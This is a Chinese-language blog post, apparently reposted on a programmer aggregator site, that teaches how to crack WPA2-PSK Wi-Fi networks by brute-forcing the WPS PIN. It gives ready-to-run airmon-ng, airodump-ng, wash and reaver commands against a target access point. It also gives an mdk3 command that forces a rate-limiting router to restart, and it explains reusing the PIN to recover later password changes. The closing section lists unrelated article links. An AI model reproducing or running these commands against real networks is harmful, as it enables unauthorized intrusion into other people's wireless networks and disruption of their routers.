使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

全栈程序员-站长 • 2022年6月4日上午9:46 • 未分类 • 阅读 30

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]【前言】现在的路由器大多都默认用WPA2-PSK方式对无线网络进行加密了，不能再像WEP加密方式那样好破解，使用字典又需要费心费力地整理字典，而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供WPS功能，通过这个功能，用户可以使用PIN码登录到路由器。但这个PIN码的长度只有8位，而且可能的取值只有11000种（注意，不是10…

大家好，又见面了，我是你们的朋友全栈君。

【前言】

现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了，不能再像 WEP 加密方式那样好破解，使用字典又需要费心费力地整理字典，而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能，通过这个功能，用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位，而且可能的取值只有11000种（注意，不是 10^8 种）。所以我们可以进行简单粗暴的穷举 PIN 码破解，而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了，但至今依然奏效。

【操作步骤】

1、切换无线网卡到监听模式：
airmon-ng start wlan0

2、刺探附近 WLAN 网络（这个命令所跟的参数值可以在步骤1 完成后从提示信息中查看到）：
airodump-ng wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、找出开启了 WPS 功能、可以使用 PIN码登录的路由器，并另外记录下该 AP 的 BSSID（约等于该 AP 的 MAC 地址）：
wash -i wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、开始进行 PIN码穷举破解（注意末尾的参数是 2 个小写字母 v）：
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明：
-i 无线网卡名称
-b 目标AP的mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key，可以提高破解速度
-vv 显示更多的非严重警告（注意这是 2 个小写字母 v）
-d 即delay每穷举一次的闲置时间预设为1秒
-c 信道编号
-p PIN码四位或八位 //可以用8位直接找到密码。

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

4、等待破解完成（这个破解可能会时间比较长，和你的目标 AP 有关，我当时花费了 12 个小时才破解出来），这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度信息：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

破解完成后，查看并记录下 PIN码和密码：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

5、获取到 PIN码后，以后即便路由器更换了密码，我们也可以很迅速地通过 PIN码重新获得新密码。以上方获取到的信息举例：

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977

【注意事项】

1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息，那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息，这表示目标路由器开启了防 PIN破解功能。因为我们是穷举 PIN码进行破解的，当连续使用超过某个次数的 PIN码后，路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能，要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx （这是上面的目标AP的MAC地址）命令让路由器主动重启或被动重启以恢复 WPS 功能。

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请联系我们举报，一经查实，本站将立刻删除。

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/136049.html原文链接：https://javaforall.net

赞 (0)

全栈程序员-站长

0 0

kettle 教程（四）：自定义 Java 代码

kettle 教程（四）：自定义 Java 代码kettle拥有很多自带的组件，能帮我们实现很多的功能。但是我们总有一些很复（qi）杂（pa）的需求，用自带的组件实现不了，或者说实现起来很复杂。那么这时我们就要用到万能的组件了（Java代码），通过自己写代码来实现任何想要的功能。自定义Java代码假设有这样一个需…

全栈程序员-站长
2022年5月23日
240
eclipse安装教程（win10版本，很全的）

eclipse安装教程（win10版本，很全的）第一步：下载JDK。先给上下载链接：http://www.oracle.com/technetwork/java/javase/downloads/index.html之后根据自己的系统选择，x86代表32位，x64代表64位。点击相应的jdk下载。同意之后下载。(记住下载到哪，打开之后一路同意安装即可)记住你把Jdk安装到哪里，文件路径不要有中文，有时会无法识别，我是将jdk安装到D盘java文件夹下第二步：java环境变量配置。（这是第一种方法，还有第二种设置JAVA_HOME，个人推

全栈程序员-站长
2022年6月13日
64
matlab中wavedec2,[ZZ] matlab中小波变换函数dwt2和wavedec2 系数提取函数appcoef2和detcoef2…

matlab中wavedec2,[ZZ] matlab中小波变换函数dwt2和wavedec2 系数提取函数appcoef2和detcoef2…https://zhidao.baidu.com/question/88038464.htmlDWT2是二维单尺度小波变换，其可以通过指定小波或者分解滤波器进行二维单尺度小波分解。而WAVEDEC2是二维多尺度小波分解。DWT2的一种语法格式是[cA,cH,cV,cD]=dwt2(X,‘wname‘)；而对应的WAVEDEC2的语法格式是[C,S]=wavedec2(X,N,‘wname‘),其中…

全栈程序员-站长
2022年7月23日
7
基于yolov4的目标检测_yolov5预训练模型

基于yolov4的目标检测_yolov5预训练模型1项目的克隆和必要的环境依赖1.1项目的克隆YOLOv5的代码是开源的，因此我们可以从github上克隆其源码。不得不说GitHub的确是全球最大的男性交友网站，里面的人个个都是人才，yolov5发布才一年左右的时间，YOLOv5就已经更新了5个分支了，分别是yolov5.1-yolov5.5分支。该项目就是利用的yolov5.5分支来作为讲解。首先打开yolov5的github的https://github.com/ultralytics/yolov5/tree…

全栈程序员-站长
2022年8月29日
1
MybatisPlus自定义sql分页查询

MybatisPlus自定义sql分页查询mybatisplus自定义sql分页查询

全栈程序员-站长
2022年6月26日
85
vmi运行流程简图_申请强制执行后多久执行

vmi运行流程简图_申请强制执行后多久执行`vmm_test_begin(testcase_name,vmm_env,”TestCaseNameString”) `vmm_test_env(testcase_name)

全栈程序员-站长
2022年9月22日
0

发表回复

关注全栈程序员社区公众号